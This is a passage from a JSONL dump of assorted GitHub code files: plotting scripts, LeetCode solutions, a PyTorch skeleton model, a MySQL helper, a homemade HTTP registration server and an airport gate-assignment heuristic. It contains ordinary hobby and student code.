mareamax+step, facecolor='red', alpha=0.3)\naxs[1][1].axhspan(30, 90, facecolor='dodgerblue', alpha=0.15)\naxs[1][1].axhspan(100, 150, facecolor='red', alpha=0.15)\n\naxs[0][0].set_ylim(mareamin,mareamax+1)\naxs[1][0].set_ylim(mareamin,mareamax+1)\naxs[0][0].set_yticks(np.arange(mareamin,mareamax+1,step))\naxs[1][0].set_yticks(np.arange(mareamin,mareamax+1,step))\naxs[1][1].set_yticks(np.arange(0,351,50))\naxs[0][0].set_xlabel(' ')\naxs[0][1].set_xlabel(' ')\naxs[0][0].grid(ls=':')\naxs[0][1].grid(ls=':')\naxs[1][0].grid(ls=':')\naxs[1][1].grid(ls=':')\naxs[0][0].legend(loc='upper left')\naxs[1][0].legend(loc='upper left')\nplt.tight_layout()\nplt.subplots_adjust(bottom=0.1,top=0.9, right=0.96, wspace=0.15, hspace=0.2)\nplt.show()\nfig.savefig(f'{path_data}{data}.png')\n","repo_name":"erikakorb/AcquaAlta","sub_path":"acqua_alta.py","file_name":"acqua_alta.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22934478487","text":"# Given a non-empty array of integers, every element appears twice except for one. Find that single one.\n#\n# Note:\n#\n# Your algorithm should have a linear runtime complexity. 
Could you implement it without using extra memory?\n#\n# Example 1:\n#\n# Input: [2,2,1]\n# Output: 1\n#\n# Example 2:\n#\n# Input: [4,1,2,1,2]\n# Output: 4\n\n\nclass Solution(object):\n\n # Naive first to mind solution: Add elements of array to a dictionary where the key is the number, and the value is the amount.\n # Then go through the dic and return the key that has a value one 1.\n # Time complexity: O(N) to insert all the numbers into the dictionary, and O(N) to find the number with value == 1\n # we're sacrificing O(N) space complexity to create the hash table.\n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n dic = {}\n for num in nums:\n if num in dic:\n dic[num] = 2\n else:\n dic[num] = 1\n\n for element in dic:\n if dic[element] == 1:\n return element\n","repo_name":"PikaPreme/data-structures-algorithms-practice","sub_path":"python/questions/136_single_number.py","file_name":"136_single_number.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16757501355","text":"def calСulate(x):\n return x**5 + abs(x)\n\nprint(\"\"\"ЛАБОРАТОРНА РОБОТА №1\nВИКОНАВ СТУДЕНТ 1 КУРСУ ГРУППИ КМ-84\nМИСАК ЮРІЙ\nПРОГРАМУВАННЯ ЛІНІЙНИХ АЛГОРИТМІВ ТА РОЗГАЛУЖЕНИХ ПРОЦЕСІВ\n\"\"\")\n\nwhile True :\n\n argument = input(\"ВВЕДІТЬ ЦІЛЕ ЧИСЛО:\")\n try:\n argument = int(argument)\n except ValueError:\n print('НАСТУПНОГО РАЗУ ВВЕДІТЬ ЦІЛЕ ЧИСЛО:')\n continue\n\n print(calСulate(int(argument)))\n","repo_name":"GeorgeMysak/LABA","sub_path":"LB1.py","file_name":"LB1.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14447334806","text":"# -*- coding: utf-8 -*-\n#\n# Author: maajor \n# Date : 2020-05-23\n# \n# Code adopted from https://github.com/CalciferZh/SMPL/blob/master/smpl_torch_batch.py\n# With simplification and correction to make it work with blender.\n\nimport numpy as np\nimport pickle\nimport torch\nfrom torch.nn import Module\nimport os\n\nclass Skeleton(Module):\n def __init__(self, skeleton_path='data/skeleton.pt'):\n \n super(Skeleton, self).__init__()\n with open(skeleton_path, 'rb') as f:\n params = pickle.load(f)\n # joints position, n_joint * 3\n #self.J = torch.from_numpy(params['J']).type(torch.float32)\n self.register_buffer('J', torch.from_numpy(params['J']).type(torch.float32))\n self.J.requires_grad = False\n self.J_num = self.J.size()[0]\n # parent joint id to child joint id mapping, 2 * n_joints\n self.kintree_table = params['kintree_table']\n self.bone_id = params['name_to_id']\n\n @staticmethod\n def rodrigues(r):\n \"\"\"\n Rodrigues' rotation formula that turns axis-angle tensor into rotation\n matrix in a batch-ed manner.\n\n Parameter:\n ----------\n r: Axis-angle rotation tensor of shape [batch_size, 1, 3].\n\n Return:\n -------\n Rotation matrix of shape [batch_size, 3, 3].\n\n \"\"\"\n #r = r.to(self.device)\n eps = r.clone().normal_(std=1e-8)\n # why not work in pytorch1.4.0\n #theta = torch.norm(r + eps, dim=(1, 2), keepdim=True) # dim cannot be tuple\n theta = torch.sqrt(torch.sum((r + eps)**2, dim=2)).view(-1,1,1)\n theta_dim = theta.shape[0]\n r_hat = r / theta\n cos = torch.cos(theta)\n z_stick = torch.zeros(theta_dim, dtype=torch.float32).to(r.device)\n m = torch.stack(\n (z_stick, -r_hat[:, 0, 2], r_hat[:, 0, 1], r_hat[:, 0, 2], z_stick,\n -r_hat[:, 0, 0], -r_hat[:, 0, 1], r_hat[:, 0, 0], z_stick), dim=1)\n m = 
torch.reshape(m, (-1, 3, 3))\n i_cube = (torch.eye(3, dtype=torch.float32).unsqueeze(dim=0) \\\n + torch.zeros((theta_dim, 3, 3), dtype=torch.float32)).to(r.device)\n A = r_hat.permute(0, 2, 1)\n dot = torch.matmul(A, r_hat)\n R = cos * i_cube + (1 - cos) * dot + torch.sin(theta) * m\n return R\n\n def to4x4(self, rotationMatrix):\n identity = torch.eye(4).view(1, 1, 4,4).repeat(rotationMatrix.shape[0],rotationMatrix.shape[1],1,1).to(rotationMatrix.device)\n identity[:, :, :3,:3] = rotationMatrix\n return identity\n\n def write_obj(self, file_name):\n with open(file_name, 'wb') as fp:\n pickle.dump(self.J_posed.detach().cpu().numpy(), fp)\n\n def forward(self, pose, trans):\n \"\"\"\n Construct a compute graph that takes in parameters and outputs a tensor as\n model vertices. Face indices are also returned as a numpy ndarray.\n\n Prameters:\n ---------\n pose: a [n_pose_joint,3] tensor indicating child joint rotation\n relative to parent joint. For root joint it's global orientation.\n Represented in a axis-angle format.\n\n trans: Global translation tensor of shape [3].\n\n Return:\n ------\n A tensor for vertices, and a numpy ndarray as face indices.\n\n \"\"\"\n parent = {\n self.kintree_table[1, i]: self.kintree_table[0, i]\n for i in range(1, self.kintree_table.shape[1])\n }\n\n batch_num = pose.shape[0]\n J = self.J.view(1,-1, 4, 4).repeat(batch_num, 1, 1, 1)\n localRot = self.rodrigues(pose.view(-1, 1, 3)).reshape(batch_num, -1, 3, 3)\n localRot = self.to4x4(localRot)\n\n # transform matrix of each joints\n root = torch.matmul(J[:,0], localRot[:,0])\n results = [root]\n for i in range(1, self.kintree_table.shape[1]):\n localTransform = torch.matmul(J[:, i], localRot[:,i])\n objectTransform = torch.matmul(results[parent[i]],localTransform)\n results.append(objectTransform)\n \n stacked = torch.stack(results, dim=1)\n\n # posed joint position\n self.J_posed = stacked[:,:,:3,3]\n\n self.J_posed = self.J_posed + torch.reshape(trans, (batch_num, 1, 3))\n\n return self.J_posed\n\n\ndef main():\n pose_size = 31*3\n\n device = torch.device(\"cpu\")\n\n pose = torch.from_numpy((np.random.rand(pose_size) - 0.5) * 0.0)\\\n .type(torch.float32).to(device).view(1,-1, 3)\n\n trans = torch.from_numpy(np.zeros(3)).type(torch.float32).to(device)\n\n model = Skeleton(skeleton_path='data/skeleton.pt')\n model.to(device)\n j = model(pose, trans.view(1, 3))\n\n theta = torch.sqrt(torch.sum((pose)**2, dim=2)).view(1, -1, 1)\n r_hat = pose / theta\n aa = torch.zeros((31,4))\n aa[:,0:1] = theta.view(-1,1)\n aa[:,1:] = r_hat.view(-1,3)\n\n result={}\n result[\"pose\"] = aa.view(-1,4).detach().cpu().numpy().tolist()\n result[\"trans\"] = trans.detach().cpu().numpy().tolist()\n result[\"joints\"] = j.detach().cpu().numpy().tolist()\n with open(\"pose.pkl\", \"wb\") as f:\n pickle.dump(result, f)\n\nif __name__ == '__main__':\n main()\n","repo_name":"maajor/latent-pose","sub_path":"nnutils/skeleton.py","file_name":"skeleton.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"48"} +{"seq_id":"17330479574","text":"# -*- coding: utf-8 -*-\nposs = [0]\nfor i in range(1, 101):\n poss.append(i * i + poss[i - 1])\n\nwhile (True):\n n = int(input())\n if (n == 0):\n break\n print(poss[n])\n","repo_name":"ThiagoCComelli/URI-Online-Judge","sub_path":"URI-py/1323.py","file_name":"1323.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
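The skeleton.py record above implements a batched Rodrigues formula in the form cos(theta) * I + (1 - cos(theta)) * k k^T + sin(theta) * K, guarding against theta = 0 by adding tiny Gaussian noise to the input. For a single axis-angle vector, the algebraically equivalent form I + sin(theta) * K + (1 - cos(theta)) * K^2 (they coincide because K^2 = k k^T - I for a unit axis) with an explicit zero-angle branch is easier to check by hand. The sketch below is a plain NumPy illustration, not the record's API.

import numpy as np

def rodrigues(r, eps=1e-12):
    # r: (3,) axis-angle vector; |r| is the angle, r/|r| the rotation axis.
    theta = np.linalg.norm(r)
    if theta < eps:
        return np.eye(3)                   # near-zero rotation: identity
    k = r / theta
    K = np.array([[0.0, -k[2], k[1]],      # skew-symmetric cross-product matrix
                  [k[2], 0.0, -k[0]],
                  [-k[1], k[0], 0.0]])
    return np.eye(3) + np.sin(theta) * K + (1.0 - np.cos(theta)) * (K @ K)

if __name__ == "__main__":
    R = rodrigues(np.array([0.0, 0.0, np.pi / 2]))   # 90 degrees about z
    assert np.allclose(R @ np.array([1.0, 0.0, 0.0]), [0.0, 1.0, 0.0])
    assert np.allclose(R @ R.T, np.eye(3))           # rotation matrices are orthonormal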
+{"seq_id":"8944700329","text":"import controllers.adjustmentPanel\n\nfrom flask import redirect\nfrom db import mysql\n\nclass db_insert_historyProductionParametersAdjustFilterImg():\n def salvar(imageName):\n id = imageName\n name = controllers.adjustmentPanel.varname\n parameter01 = controllers.adjustmentPanel.varTrackbar1\n parameter02 = controllers.adjustmentPanel.varTrackbar2\n parameter03 = controllers.adjustmentPanel.varTrackbar3\n parameter04 = controllers.adjustmentPanel.varTrackbar4\n parameter05 = controllers.adjustmentPanel.varTrackbar5\n parameter06 = controllers.adjustmentPanel.varTrackbar6\n parameter07 = controllers.adjustmentPanel.varTrackbar_iterations_erode\n parameter08 = controllers.adjustmentPanel.varTrackbar_iterations_dilate\n parameter09 = controllers.adjustmentPanel.varTrackbar_TamMinLv\n parameter10 = controllers.adjustmentPanel.varTrackbar_TamMaxLv\n parameter11 = controllers.adjustmentPanel.varTrackbar_TamMinLh\n parameter12 = controllers.adjustmentPanel.varTrackbar_TamMaxLh\n parameter13 = controllers.adjustmentPanel.varTrackbar_TamMin\n parameter14 = controllers.adjustmentPanel.varTrackbar_TamMax\n parameter15 = controllers.adjustmentPanel.varTrackbar_LineHorizontal\n parameter16 = controllers.adjustmentPanel.varTrackbar_LineVertical\n parameter17 = controllers.adjustmentPanel.varTrackbar_LineRange\n parameter18 = 0\n parameter19 = 0\n parameter20 = 0\n parameterReal01 = controllers.adjustmentPanel.varTrackbar_ConstResolutionPixelMm_X\n parameterReal02 = controllers.adjustmentPanel.varTrackbar_ConstResolutionPixelMm_Y\n parameterReal03 = 0.0\n parameterReal04 = 0.0\n\n with mysql.cursor() as cur:\n #try:\n cur.execute(\"INSERT INTO historyProductionParametersAdjustFilterImg VALUE\"\n \"(%s, %s, \"\n \"%s, %s, %s, %s, %s, \"\n \"%s, %s, %s, %s, %s, \"\n \"%s, %s, %s, %s, %s, \"\n \"%s, %s, %s, %s, %s,\"\n \"%s, %s, %s, %s\"\n \")\",\n (id, name,\n parameter01 , parameter02 , parameter03 , parameter04 , parameter05,\n parameter06 , parameter07 , parameter08 , parameter09 , parameter10,\n parameter11 , parameter12 , parameter13 , parameter14 , parameter15,\n parameter16 , parameter17 , parameter18 , parameter19 , parameter20,\n parameterReal01 , parameterReal02 , parameterReal03 , parameterReal04\n ))\n cur.connection.commit()\n return redirect('base.html')","repo_name":"RenanSyntro/pythonOpencvDell_FLask","sub_path":"src/database/db_insert_historyProductionParametersAdjustFilterImg.py","file_name":"db_insert_historyProductionParametersAdjustFilterImg.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71725189266","text":"\"\"\"\n给定一个字符串数组,将字母异位词组合在一起。字母异位词指字母相同,但排列不同的字符串。\n\n示例:\n\n输入: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]\n输出:\n[\n [\"ate\",\"eat\",\"tea\"],\n [\"nat\",\"tan\"],\n [\"bat\"]\n]\n\n\"\"\"\n\n\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n\n # key:每个字母出现的次数 value:一个装单词的list\n hashmap = {}\n\n for string in strs:\n key = self.getKeybyCount(string)\n if key in hashmap:\n hashmap[key].append(string)\n else:\n hashmap[key] = [string]\n\n return [value for value in hashmap.values()]\n\n # 把每个单词所对应的hash给记录下来\n def getKeybyCount(self, string):\n table = [0] * 26\n for char in string:\n table[ord(char) - ord(\"a\")] += 1\n\n return str(table)\n\n\n\"\"\" \nTime: 
O(n*k)\nhttps://algocasts.io/episodes/vkmerKGb\n\"\"\"","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/Hashmap/49. 字母异位词分组(变位词).py","file_name":"49. 字母异位词分组(变位词).py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24147585171","text":"import socket,random,threading,hashlib,time,sys,os\nsys.path.append('../../')\nsys.path.append('../')\nfrom multiprocessing import Process\nfrom cbEmail import Email\nfrom Config import Config\nfrom myLib.mydb import mysqldb as mydb\nclass log:\n def __init__(self):\n self.data=''\n def out(self,text,filename):\n nowTime=time.localtime()\n nowTime=\"[%s-%s-%s %s:%s:%s]\"%(nowTime.tm_year,nowTime.tm_mon,nowTime.tm_mday,nowTime.tm_hour,nowTime.tm_min,nowTime.tm_sec)\n self.data+=''+nowTime+text\n if len(self.data.encode('utf-8'))>0:\n # print('日志缓存已满,写入到文件中')\n print(self.data)\n with open('log/%s.txt'%filename,'a',encoding='utf-8') as f:\n f.write(self.data)\n self.data=''\nclass HTTPStatus:\n def __init__(self,_type,content=None):\n self.response_headers = \"Server: CB HTTP Server\\r\\ncontent-type: text/html; charset=UTF-8\\r\\n\"\n if _type=='成功':#成功\n self.response_start_line = \"HTTP/1.1 200 成功\\r\\n\"\n self.response_body = '成功'\n\n elif _type=='拒绝':#拒绝请求(被服务器禁止,如IP被封锁)\n self.response_start_line = \"HTTP/1.1 403 请求被拒绝\\r\\n\"\n self.response_body = '被服务器拒绝访问'\n\n elif _type=='未授权':#拒绝请求(被服务器禁止,如IP被封锁)\n self.response_start_line = \"HTTP/1.1 401 权限不足\\r\\n\"\n self.response_body = '权限不足'\n\n elif _type=='失败':#拒绝请求(被服务器禁止,如IP被封锁)\n self.response_start_line = \"HTTP/1.1 202 请求失败\\r\\n\"\n self.response_body = content\n\n elif _type=='参数错误':#错误访问(有对应请求头,但参数不合法)\n self.response_start_line = \"HTTP/1.1 405 参数错误\\r\\n\"\n self.response_body = '参数错误'\n\n elif _type=='请求头错误':#错误访问(无请求头)\n self.response_start_line = \"HTTP/1.1 417 错误的请求\\r\\n\"\n self.response_body = '非法请求'\n\n elif _type=='服务器错误':#服务器错误(当服务器处理出现错误)\n self.response_start_line = \"HTTP/1.1 500 服务器出现错误\\r\\n\"\n self.response_body = '服务器发生错误'\n\n elif _type=='请求不存在':#不存在的请求(服务器不存在的请求类型)\n self.response_start_line = \"HTTP/1.1 400 不存在的请求类型\\r\\n\"\n self.response_body = '不支持的请求类型'\n\n self.response = self.response_start_line + self.response_headers + \"\\r\\n\" + self.response_body\nclass HTTPProcess:\n def __init__(self,data,db):\n self.db=db\n self.parameter=None\n data=data.replace('\\r','')\n data=data.split('\\n')\n a1=data[0].index(' ')+1\n a2=data[0].index(' ',a1+1)\n self.method=data[0][:a1-1]\n self.protocol=data[0][a2+1:]\n self.url=data[0][a1:a2]\n try:\n a1=self.url.index('?')\n self.interface=self.url[1:a1]\n parameterStr=self.url[a1+1:]\n self.parameter={}\n i=0\n while i0:\n self.result=HTTPStatus('成功')\n print('[%d]发送验证码邮件:'%index,self.parameter['email'],confirmcode)\n self.sendConfirmCodeEmail(self.parameter['email'],confirmcode)\n else:\n print('[4]身份码不合法,此请求权限不够,返回NoPermissions')\n self.result=HTTPStatus('未授权')\n return\n else:\n print('[3]数据合理性检查不通过')\n self.result=HTTPStatus('参数错误')\n if self.interface == 'register':\n print('[2]此请求为用户注册')\n if self.checkRequestCondition('register'):\n print('[3]数据合理性检查通过')\n if self.db.exist('user',{'account':self.parameter['account']}):\n print('[4]账号已被使用,注册失败')\n self.result=HTTPStatus('失败','账号已被使用')\n else:\n if self.db.exist('user',{'email':self.parameter['email']}):\n print('[4]邮箱已被使用,注册失败')\n self.result=HTTPStatus('失败','邮箱已被使用')\n else:\n print('[4]账号或邮箱可被使用')\n if 
self.db.exist('confirmcode',{'email':self.parameter['email']}):\n print('[5]邮箱验证码已在数据库内')\n count,r=self.db.selectFromWhere('confirmcode','email=\\'%s\\''%(self.parameter['email']))\n code=r[0][2]\n if code==self.parameter['confirmcode']:\n print('[6]验证码匹配成功')\n if self.db.insertTo('user',{'name':'新用户','account':self.parameter['account'],'password':self.parameter['password'],'email':self.parameter['email'],'regDate':self.db.getNowTime(),'lastDate':self.db.getNowTime(),'lastIP':self.header['Host'][:self.header['Host'].index(':')]}):\n print('[7]新的用户数据插入成功')\n self.result=HTTPStatus('成功')\n else:\n print('[7]新的用户数据插入失败')\n self.result=HTTPStatus('服务器错误')\n else:\n print('[6]验证码匹配失败')\n self.result=HTTPStatus('失败','验证码错误')\n else:\n print('[5]邮箱验证码未数据库内,失败')\n self.result=HTTPStatus('失败','邮箱未进行验证或已过期')\n else:\n print('[3]数据合理性检查不通过,返回参数错误')\n self.result=HTTPStatus('参数错误')\n return\n self.result=HTTPStatus('请求不存在')\n def __str__(self):\n s='请求方法:'+self.method+'\\n'\n s+='请求URL:'+self.url+'\\n'\n s+='请求接口'+self.interface+'\\n'\n s+='请求参数'+(str(self.parameter) if self.parameter else '无')+'\\n'\n s+='请求协议版本:'+self.protocol+'\\n'\n s+='请求头:\\n'\n for i in self.header:\n s+='%s:%s\\n'%(i,self.header[i])\n return s\nclass HTTPServer:\n def __init__(self):\n self.log=log()\n\n self.server_socket=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.bind(('',20203))\n self.process=Process(target=self.start,args=())\n self.process.start()\n def start(self):\n self.db=mydb('127.0.0.1','root','123456','cb')\n self.server_socket.listen()\n while True:\n client_socket, client_address = self.server_socket.accept()\n self.log.out(\"[%s, %s]用户连接上了\" % client_address,'httplog')\n clientProcess = threading.Thread(target=self.clientProcess, args=(client_socket,))\n clientProcess.start()\n \n def clientProcess(self,client_sock):\n request_data = client_sock.recv(1024).decode('utf-8')\n print('原始数据:')\n print(request_data)\n print('---------------------')\n print('数据接受完成,开始处理数据')\n process=HTTPProcess(request_data,self.db)\n process.process()\n self.log.out('请求响应:%s'%process.result.response_start_line,'httplog')\n client_sock.send(bytes(process.result.response, \"utf-8\"))\n client_sock.close()\n\nif __name__ == \"__main__\":\n server=HTTPServer()\n server.start()","repo_name":"Minicking/cloudbird","sub_path":"Server/HTTPServer.py","file_name":"HTTPServer.py","file_ext":"py","file_size_in_byte":11367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5311836567","text":"import sys\nimport numpy as np\nimport time\nimport threading\nimport xlrd\nimport numpy as np\nimport argparse\n\nparser=argparse.ArgumentParser()\nparser.add_argument('--problem',help='problrm number',type=int)\nparser.add_argument('--method',help='used function: greedy or genetic',type=str)\nargs=parser.parse_args()\n\nclass process_data:\n\t\"\"\"\n\tget data from csv file. 
extract pucks, tickets, gates, and calculate puck's timetable\n\ta important method indexof_pucks_gates(elf,pucks,gates) is designed to connect pucks and gates, return a pucks.num x gates.num bool metrix -- Index.\n\tIndex[i,j]==True present pucks[i] can use gates[j]\n\t\"\"\"\n\tdef __init__(self, filepath):\n\t\tself.filepath=filepath\n\t\tself.Pucks,self.Tickets,self.Gates=self.readfile(self.filepath)\n\t\tself.selecttickets=self.select_Tickets(self.Tickets)\n\t\tself.selectpucks=self.select_Puck(self.Pucks)\n\t\tself.Timetable=self.get_timetable(self.selectpucks)\n\n\tdef readfile(self,filepath):\n\t\tPucksfile = open(filepath+'/original_data/Pucks.csv')\n\t\tTicketsfile=open(filepath+'/original_data/Tickets.csv')\n\t\tGatesfile=open(filepath+'/original_data/Gates.csv')\n\t\tsourcePucks=Pucksfile.readlines()\n\t\tsourceTickets=Ticketsfile.readlines()\n\t\tsourceGates=Gatesfile.readlines()\n\t\tPucks=[]\n\t\tTickets=[]\n\t\tGates=[]\n\t\tfor i in sourcePucks:\n\t\t\tPucks.append(i.strip().split(','))\n\t\tfor i in sourceTickets:\n\t\t\tTickets.append(i.strip().split(','))\n\t\tfor i in sourceGates:\n\t\t\ttemp=i.strip().split(',')\n\t\t\ttemp_p=[]\n\t\t\tfor ii in range(len(temp)):\n\t\t\t\tif temp[ii].startswith('\\\"'):\n\t\t\t\t\ttemp_p.append(temp[ii]+temp[ii+1])\n\t\t\t\telif temp[ii].endswith('\\\"'):\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\ttemp_p.append(temp[ii])\n\t\t\tGates.append(temp_p)\n\t\treturn np.array(Pucks),np.array(Tickets),np.array(Gates)\n\n\tdef select_Tickets(self,data):\n\t\tdatasize=len(data)\n\t\tprint('before tickets length:',datasize)\n\t\tindex=np.zeros(datasize).astype(bool)\n\t\tfor ii in range(datasize):\n\t\t\tif data[ii][3].startswith('20') or data[ii][5].startswith('20'):\n\t\t\t\tindex[ii]=True\t\n\t\tselecttickets=data[index]\n\t\tprint('selected tickets length:',len(selecttickets))\n\t\treturn selecttickets\n\n\tdef select_Puck(self,data):\n\t\tdatasize=len(data)\n\t\tprint('before pucks length:',datasize)\n\t\tindex=np.zeros(datasize).astype(bool)\n\t\tfor ii in range(datasize):\n\t\t\tif data[ii][1].startswith('20') or data[ii][6].startswith('20'):\n\t\t\t\tindex[ii]=True\n\t\tselectpucks=data[index]\n\t\tprint('selected pucks length:',len(selectpucks))\n\t\treturn selectpucks\n\n\tdef get_timetable(self,pucks):\n\t\ttimetable=np.zeros(shape=(pucks.shape[0],2),dtype=int)\n\t\tmini=0\n\t\tmindata=1000000\n\t\tfor ii in range(pucks.shape[0]):\n\t\t\tstartday=int(pucks[ii,1][:2])\n\t\t\tendday=int(pucks[ii,6][:2])\n\t\t\tstdstarttime=(startday-19)*1440+int(pucks[ii,2].split(':')[0])*60+int(pucks[ii,2].split(':')[1])\n\t\t\tstdendtime=(endday-19)*1440+int(pucks[ii,7].split(':')[0])*60+int(pucks[ii,7].split(':')[1])+45\n\t\t\t'''\n\t\t\tstartday=time.strptime(pucks[ii,1], \"%d-%b-%y\")\n\t\t\tendday=time.strptime(pucks[ii,6], \"%d-%b-%y\")\n\t\t\tstarttime=time.strptime(pucks[ii,2], \"%H:%M\")\n\t\t\tendtime=time.strptime(pucks[ii,7], \"%H:%M\")\n\t\t\tstdstarttime=(startday.tm_mday-19)*24*60+starttime.tm_hour*60+starttime.tm_min\n\t\t\tstdendtime=(endday.tm_mday-19)*24*60+endtime.tm_hour*60+endtime.tm_min+45\n\t\t\t'''\n\t\t\ttimetable[ii,0]=stdstarttime\n\t\t\ttimetable[ii,1]=stdendtime\n\t\t\tif stdstarttime=sortedunion[lastjj,2]:\n\t\t\t\t\t\t\talignmenttable[sortedunion[jj,0]]=ii\n\t\t\t\t\t\t\tlastjj=jj\n\t\t\t\t\t\t\tnum+=1\t\n\t\tfor ii in 
rest:\n\t\t\tindex=np.arange(0,self.choosedpucks.shape[0],1).astype(int)\n\t\t\tsubindex=index[self.Indexs[:,ii]]\n\t\t\tsubtimetable=self.choosedtimetable[self.Indexs[:,ii]]\n\t\t\tsubunion=np.concatenate((subindex.reshape(-1,1),subtimetable),axis=1)\n\t\t\tsubtimeindex=np.argsort(subunion,axis=0)\n\t\t\tsortedunion=subunion[subtimeindex[:,2]]\n\t\t\t\n\t\t\tnum=0\n\t\t\tfirst=True\n\t\t\tfor jj in range(sortedunion.shape[0]):\n\t\t\t\tif alignmenttable[sortedunion[jj,0]]==-1:\n\t\t\t\t\tif first:\n\t\t\t\t\t\talignmenttable[sortedunion[jj,0]]=ii\n\t\t\t\t\t\tlastjj=jj\n\t\t\t\t\t\tfirst=False\n\t\t\t\t\t\tnum+=1\n\t\t\t\t\telif sortedunion[jj,1]>=sortedunion[lastjj,2]:\n\t\t\t\t\t\talignmenttable[sortedunion[jj,0]]=ii\n\t\t\t\t\t\tlastjj=jj\n\t\t\t\t\t\tnum+=1\n\t\t\t#print('#########',num)\t\n\t\treturn alignmenttable\n\n\tdef Roulette_gambling(self,pucks,gates,Index,timetable):\n\t\talignmenttable=np.zeros(shape=(pucks.shape[0]),dtype=int)\n\t\talignmenttable-=1\n\t\tgate_sub=[]\n\t\trest=[]\n\t\tposition=np.zeros(shape=(gates.shape[0],3),dtype=int)\n\t\t#position[,] : in colume 0 demention record if it is first;1 demention record lastjj; 2 demention record current position\n\t\ttag=True\n\n\t\tfor ii in range(gates.shape[0]):\n\t\t\tif gates[ii][3].startswith('\\\"') or Gates[ii][4].startswith('\\\"'):\n\t\t\t\trest.append(ii)\n\t\t\tindex=np.arange(0,pucks.shape[0],1).astype(int)\n\t\t\tsubindex=index[Index[:,ii]]\n\t\t\tsubtimetable=timetable[Index[:,ii]]\n\t\t\tsubunion=np.concatenate((subindex.reshape(-1,1),subtimetable),axis=1)\n\t\t\tsubtimeindex=np.argsort(subunion,axis=0)\n\t\t\tsortedunion=subunion[subtimeindex[:,2]]\n\t\t\tgate_sub.append(sortedunion)\n\n\t\twhile tag:\n\t\t\tcountnum=0\n\t\t\trandomindex=np.arange(0,gates.shape[0],1)\n\t\t\tnp.random.shuffle(randomindex)\n\t\t\tfor ii in randomindex:\n\t\t\t\tif ii not in rest:\n\t\t\t\t\tif len(gate_sub[ii])>position[ii,2]:\n\t\t\t\t\t\tif alignmenttable[gate_sub[ii][position[ii,2],0]]==-1:\n\t\t\t\t\t\t\tif position[ii,0]==0:\n\t\t\t\t\t\t\t\talignmenttable[gate_sub[ii][position[ii,2],0]]=ii\n\t\t\t\t\t\t\t\tposition[ii,0]=1\n\t\t\t\t\t\t\t\tposition[ii,1]=position[ii,2]\n\t\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telif gate_sub[ii][position[ii,2],1]>=gate_sub[ii][position[ii,1],2]:\n\t\t\t\t\t\t\t\talignmenttable[gate_sub[ii][position[ii,2],0]]=ii\n\t\t\t\t\t\t\t\tposition[ii,1]=position[ii,2]\n\t\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tcountnum+=1\n\n\t\t\tif countnum==gates.shape[0]-len(rest):\n\t\t\t\ttag=False\n\n\t\ttag=True\n\t\twhile tag:\n\t\t\tcountnum=0\n\t\t\trest=np.array(rest,dtype=int)\n\t\t\tnp.random.shuffle(rest)\n\t\t\tfor ii in rest:\n\t\t\t\tif len(gate_sub[ii])>position[ii,2]:\n\t\t\t\t\tif alignmenttable[gate_sub[ii][position[ii,2],0]]==-1:\n\t\t\t\t\t\tif position[ii,0]==0:\n\t\t\t\t\t\t\talignmenttable[gate_sub[ii][position[ii,2],0]]=ii\n\t\t\t\t\t\t\tposition[ii,0]=1\n\t\t\t\t\t\t\tposition[ii,1]=position[ii,2]\n\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\t\t\n\t\t\t\t\t\telif 
gate_sub[ii][position[ii,2],1]>=gate_sub[ii][position[ii,1],2]:\n\t\t\t\t\t\t\talignmenttable[gate_sub[ii][position[ii,2],0]]=ii\n\t\t\t\t\t\t\tposition[ii,1]=position[ii,2]\n\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\t\t\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\telse:\n\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tcountnum+=1\n\t\t\tif countnum==rest.shape[0]:\n\t\t\t\ttag=False\n\n\t\treturn alignmenttable\n\n\tdef get_result(self):\n\t\tmaxalign=0\n\t\tcounter=0\n\t\twhile counter<20:\n\t\t\t'''\n\t\t\tgreedy distribution use self.distribute_mostpucks(True)\n\t\t\tRoulette_gambling distribution use self.Roulette_gambling(self.choosedpucks,self.Gates,self.Indexs,self.choosedtimetable)\n\t\t\t'''\n\t\t\tAlignmenttable=self.distribute_mostpucks(True)\n\t\t\t#Alignmenttable=self.Roulette_gambling(self.choosedpucks,self.Gates,self.Indexs,self.choosedtimetable)\n\t\t\talign_len=len([kk for kk in Alignmenttable if 